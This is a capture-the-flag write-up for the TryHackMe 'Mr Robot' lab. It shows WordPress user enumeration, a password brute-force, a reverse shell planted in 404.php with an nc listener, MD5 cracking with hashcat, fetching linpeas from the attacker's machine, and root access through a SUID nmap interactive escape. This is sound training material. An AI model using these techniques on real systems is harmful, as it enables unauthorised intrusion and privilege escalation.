Mr Robot
Overview
Overview
Mr. Robot is an amazing show and Rami Malik played the central role of an elite hacker named Elliot. This machine is based on the show where they actually had very realistic hacking techniques demonstrated throughout the show. If you haven’t watched it, i will highly recommend it.
So, as THM describes it, the machine is based on the show and having that background give you a slight advantage while enumerating.
Recon
Lets move on with a simple nmap scthumbnail: “/lab/tryhackme/gamezone/data/gamezone-thumb.png” an and see what we can come up with.
1# nmap -Pn -A -T4 -oN brainpan1.nmap.txt 10.10.167.217^C
2root@kinetic:/oscp/LABs/zerotrust/content/lab# cd tryhackme/mrRobot/
3root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/mrRobot# cd data
4root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/mrRobot/data# 10.10.167.217^C
5root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/mrRobot/data# nmap -sS -sV -O -Pn -A -T4 -oN mrrobot.nmap.txt 10.10.167.217
6Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
7Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-03 10:36 EST
8Nmap scan report for 10.10.167.217
9Host is up (0.077s latency).
10Not shown: 997 filtered ports
11PORT STATE SERVICE VERSION
1222/tcp closed ssh
1380/tcp open http Apache httpd
14|_http-server-header: Apache
15|_http-title: Site doesn't have a title (text/html).
16443/tcp open ssl/http Apache httpd
17|_http-server-header: Apache
18|_http-title: Site doesn't have a title (text/html).
19| ssl-cert: Subject: commonName=www.example.com
20| Not valid before: 2015-09-16T10:45:03
21|_Not valid after: 2025-09-13T10:45:03
22Device type: general purpose|specialized|storage-misc|broadband router|printer|WAP
23Running (JUST GUESSING): Linux 3.X|4.X|5.X|2.6.X (91%), Crestron 2-Series (89%), HP embedded (89%), Asus embedded (88%)
24OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.4 cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6 cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4
25Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.2 - 3.5 (90%), Linux 3.2 - 3.8 (90%), Linux 4.2 (90%), Linux 4.4 (90%), Linux 5.4 (90%)
26No exact OS matches for host (test conditions non-ideal).
27Network Distance: 4 hops
28
29TRACEROUTE (using port 22/tcp)
30HOP RTT ADDRESS
311 5.08 ms 10.6.0.1
322 ... 3
334 74.42 ms 10.10.167.217
34
35OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
36Nmap done: 1 IP address (1 host up) scanned in 31.14 seconds
37
Summary:
- Its a linux machine
- Port 80/443 are open and we can try to enumerate the web service as a next step
- There is SSH port but its closed.
Enumeration
When you visit the server’s web service on your browser you will notice that it has a wordpress blog running but there is nothing much on it. Fire up dirbuster to do directory scanning and also run wpscan to know more about the wordpress installation.
In the meanwhile, visit wp-admin and try to enter some default username/password combinations and enumerate. You can also try the “forget password” and try admin,elliot as usernames and see what comes back.
The website confirms that “admin” is not a user on the system but elliot is!
Wpscan should also reveal that the robots.txt is accessible. Go to http://10.10.102.138/robots.txt and you will notice that it lists two files (one is the first key). Download those files!
Lets use ZAP tool to bruteforce elliot’s login with the wordlist fsocity.dic that you downloaded before. Note that the file has bunch of duplicates and you can eliminate those by -
1cat fsocity.dic |sort |uniq > fsoc.txt
we will use the fsoc.txt as our word list. Fire up ZAP fuzzer and crack the password -
This took me about 5-10 minutes and finally it got be through with Elliot’s creds.
You should now have cracked Elliot’s password!
Exploit
Lets go to the theme editor view in the admin screen and edit 404.php - why - because this will not break the theme or the website and we can easily run it by visiting a nonexistent page.
Since we are going to exploit the 404.php, lets go to a nonexistent page on the website so that the 404 gets triggered and the server will call 404.php which will run our reverse shell and we will try to catch is using a listener as below -
On Browser - https://10.10.102.138/wp-admin2222
While you start a listener on your attack machine -
1$ nc -lvnp 4444
2listening on [any] 4444 ...
3connect to [10.6.19.215] from (UNKNOWN) [10.10.102.138] 50256
4Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
5 02:13:17 up 1:35, 0 users, load average: 0.00, 0.28, 1.51
6USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
7uid=1(daemon) gid=1(daemon) groups=1(daemon)
8/bin/sh: 0: can't access tty; job control turned off
9$
10
You should now catch the reverse shell -
1$ whoami
2daemon
3$ ls -l
4total 76
5drwxr-xr-x 2 root root 4096 Sep 16 2015 bin
6drwxr-xr-x 3 root root 4096 Oct 3 2018 boot
7drwxr-xr-x 13 root root 3820 Dec 4 00:38 dev
8drwxr-xr-x 77 root root 4096 Dec 4 00:38 etc
9drwxr-xr-x 3 root root 4096 Nov 13 2015 home
10lrwxrwxrwx 1 root root 33 Jun 24 2015 initrd.img -> boot/initrd.img-3.13.0-55-generic
11drwxr-xr-x 16 root root 4096 Jun 24 2015 lib
12drwxr-xr-x 2 root root 4096 Jun 24 2015 lib64
13drwx------ 2 root root 16384 Jun 24 2015 lost+found
14drwxr-xr-x 2 root root 4096 Jun 24 2015 media
15drwxr-xr-x 4 root root 4096 Nov 13 2015 mnt
16drwxr-xr-x 3 root root 4096 Sep 16 2015 opt
17dr-xr-xr-x 116 root root 0 Dec 4 00:38 proc
18drwx------ 3 root root 4096 Nov 13 2015 root
19drwxr-xr-x 14 root root 480 Dec 4 00:38 run
20drwxr-xr-x 2 root root 4096 Nov 13 2015 sbin
21drwxr-xr-x 3 root root 4096 Jun 24 2015 srv
22dr-xr-xr-x 13 root root 0 Dec 4 00:38 sys
23drwxrwxrwt 4 root root 4096 Dec 4 00:38 tmp
24drwxr-xr-x 10 root root 4096 Jun 24 2015 usr
25drwxr-xr-x 11 root root 4096 Jun 24 2015 var
26lrwxrwxrwx 1 root root 30 Jun 24 2015 vmlinuz -> boot/vmlinuz-3.13.0-55-generic
27
Spawn a shell with tty using the python command and enumerate further. You will notice that there is a robot user on the machine. In the home directory of that user, you will find another key along with a hashed password.
1$ cd /home
2$ python -c 'import pty; pty.spawn("/bin/bash");'
3daemon@linux:/home$ ls -l
4ls -l
5total 4
6drwxr-xr-x 2 root root 4096 Nov 13 2015 robot
7daemon@linux:/home$ cd robot
8cd robot
9daemon@linux:/home/robot$ ls
10ls
11key-2-of-3.txt password.raw-md5
12daemon@linux:/home/robot$
13
1daemon@linux:/home/robot$ ls -l
2ls -l
3total 8
4-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
5-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
6daemon@linux:/home/robot$ cat password.raw-md5
7cat password.raw-md5
8robot:c3fcd3d76192e4XXXXXXXXXX
9daemon@linux:/home/robot$
10
You can either crackstation it ! or use hashcat as below
1$ hashcat -a 0 -m 0 ./hash.txt /usr/share/wordlists/rockyou.txt
2hashcat (v6.1.1) starting...
3
4OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
5=============================================================================================================================
6* Device #1: pthread-Intel(R) Core(TM) i7-7700K CPU @ 4.20GHz, 2891/2955 MB (1024 MB allocatable), 2MCU
7
8Minimum password length supported by kernel: 0
9Maximum password length supported by kernel: 256
10
11Hashes: 1 digests; 1 unique digests, 1 unique salts
12Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
13Rules: 1
14
15Applicable optimizers applied:
16* Zero-Byte
17* Early-Skip
18* Not-Salted
19* Not-Iterated
20* Single-Hash
21* Single-Salt
22* Raw-Hash
23
24ATTENTION! Pure (unoptimized) backend kernels selected.
25Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
26If you want to switch to optimized backend kernels, append -O to your commandline.
27See the above message to find out about the exact limits.
28
29Watchdog: Hardware monitoring interface not found on your system.
30Watchdog: Temperature abort trigger disabled.
31
32Host memory required for this attack: 64 MB
33
34
35Dictionary cache built:
36* Filename..: /usr/share/wordlists/rockyou.txt
37* Passwords.: 14344392
38* Bytes.....: 139921507
39* Keyspace..: 14344385
40* Runtime...: 1 sec
41
42c3fcd3d76192eXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXX
43
44Session..........: hashcat
45Status...........: Cracked
46Hash.Name........: MD5
47Hash.Target......: c3fcd3d76192eXXXXXXXXXX
48Time.Started.....: Thu Dec 3 21:22:23 2020 (0 secs)
49Time.Estimated...: Thu Dec 3 21:22:23 2020 (0 secs)
50Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
51Guess.Queue......: 1/1 (100.00%)
52Speed.#1.........: 606.3 kH/s (0.36ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
53Recovered........: 1/1 (100.00%) Digests
54Progress.........: 40960/14344385 (0.29%)
55Rejected.........: 0/40960 (0.00%)
56Restore.Point....: 38912/14344385 (0.27%)
57Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
58Candidates.#1....: treetree -> loserface1
59
60Started: Thu Dec 3 21:22:01 2020
61Stopped: Thu Dec 3 21:22:23 2020
Now, you know the password of the user “robot” on the machine, you can switch to that user using -
1daemon@linux:/home/robot$ su - robot
2su - robot
3Password: abcdefgXXXXXXXXXX
4
5$ whoami
6whoami
7robot
8$
9
Post-Exploit/PrivEsc
Now, download LINPEAS from your attack machine on to this robot machine and run it.
Attack machine listener :
1eneloop@kinetic:/oscp/tools/PEAS$ cd linPEAS/
2eneloop@kinetic:/oscp/tools/PEAS/linPEAS$ ls
3images linpeas.sh README.md
4eneloop@kinetic:/oscp/tools/PEAS/linPEAS$ python3 -m http-server
5/usr/bin/python3: No module named http-server
6eneloop@kinetic:/oscp/tools/PEAS/linPEAS$ python3 -m http.server
7Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
810.10.102.138 - - [03/Dec/2020 21:27:19] "GET /linpeas.sh HTTP/1.1" 200 -
9
On robot machine:
1robot@linux:/tmp$ chmod 755 linpeas.sh
2chmod 755 linpeas.sh
3robot@linux:/tmp$ ./linpeas.sh
4./linpeas.sh
5 Starting linpeas. Caching Writable Folders...
6
You will get some interesting observations and possible next path into the privilege escalation.
1
2====================================( Interesting Files )=====================================
3[+] SUID - Check easy privesc, exploits and write perms
4[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
5-rwsr-xr-x 1 root root 46K Feb 17 2014 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
6-rwsr-xr-x 1 root root 67K Feb 17 2014 /usr/bin/gpasswd
7-rwsr-xr-x 1 root root 41K Feb 17 2014 /usr/bin/chsh
8-rwsr-xr-x 1 root root 46K Feb 17 2014 /usr/bin/chfn ---> SuSE_9.3/10
9-rwsr-xr-x 1 root root 32K Feb 17 2014 /usr/bin/newgrp ---> HP-UX_10.20
10-rwsr-xr-x 1 root root 37K Feb 17 2014 /bin/su
11-rwsr-xr-x 1 root root 10K Feb 25 2014 /usr/lib/eject/dmcrypt-get-device
12-rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping6
13-rwsr-xr-x 1 root root 44K May 7 2014 /bin/ping
14-rwsr-xr-x 1 root root 431K May 12 2014 /usr/lib/openssh/ssh-keysign
15-rwsr-xr-x 1 root root 68K Feb 12 2015 /bin/umount ---> BSD/Linux(08-1996)
16-rwsr-xr-x 1 root root 93K Feb 12 2015 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
17-rwsr-xr-x 1 root root 11K Feb 25 2015 /usr/lib/pt_chown ---> GNU_glibc_2.1/2.1.1_-6(08-1999)
18-rwsr-xr-x 1 root root 152K Mar 12 2015 /usr/bin/sudo ---> /sudo$
19-rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmap
20-r-sr-xr-x 1 root root 9.4K Nov 13 2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
21-r-sr-xr-x 1 root root 14K Nov 13 2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
22
23
Right there, NMAP seems to be the jucy target as the suid bit is set. A quick visit to GTFObins will lead you to multiple ways you can exploit nmap to escalate your privilege.
Exploit nmap
1robot@linux:/tmp$ nmap --interactive
2nmap --interactive
3
4Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
5Welcome to Interactive Mode -- press h <enter> for help
6nmap> !sh
7!sh
8# whoami
9whoami
10root
11#
You should now have root on this machine, go and get your key from /root.
1# cd /root
2cd /root
3# ls
4ls
5firstboot_done key-3-of-3.txt
6# cat key-3-of-3.txt
7cat key-3-of-3.txt
8XXXXXXXXXXXXXXXXXXXXXXXX
9#
10
I am sure there are more ways to hack into this machine but I will leave it for another day.